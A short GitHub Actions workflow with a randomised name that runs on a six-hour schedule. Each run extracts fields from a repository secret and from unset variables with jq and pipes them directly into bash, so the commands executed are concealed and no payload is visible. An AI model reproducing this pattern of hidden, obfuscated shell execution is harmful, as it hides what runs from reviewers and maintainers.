name: youquancun4523
on:
  workflow_dispatch:
  schedule:
    - cron: '51 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: youquancun4523
        env:
          ya6: ${{ secrets.ya6 }}
        run: |
          echo $ya6 | jq -r .lxnl1 | /bin/bash
          echo $yoy759 | jq -r .rvepd16186 | /bin/bash
          echo $sbq65 | jq -r .sslcd5 | /bin/bash
          echo $zdyz7227 | jq -r .k7 | /bin/bash
          echo $rmp8706 | jq -r .xcyc2621 | /bin/bash
          echo $vbd5 | jq -r .a8962 | /bin/bash
          echo $qnto02 | jq -r .zcu83506 | /bin/bash
          echo $po8810 | jq -r .wvsho19638 | /bin/bash

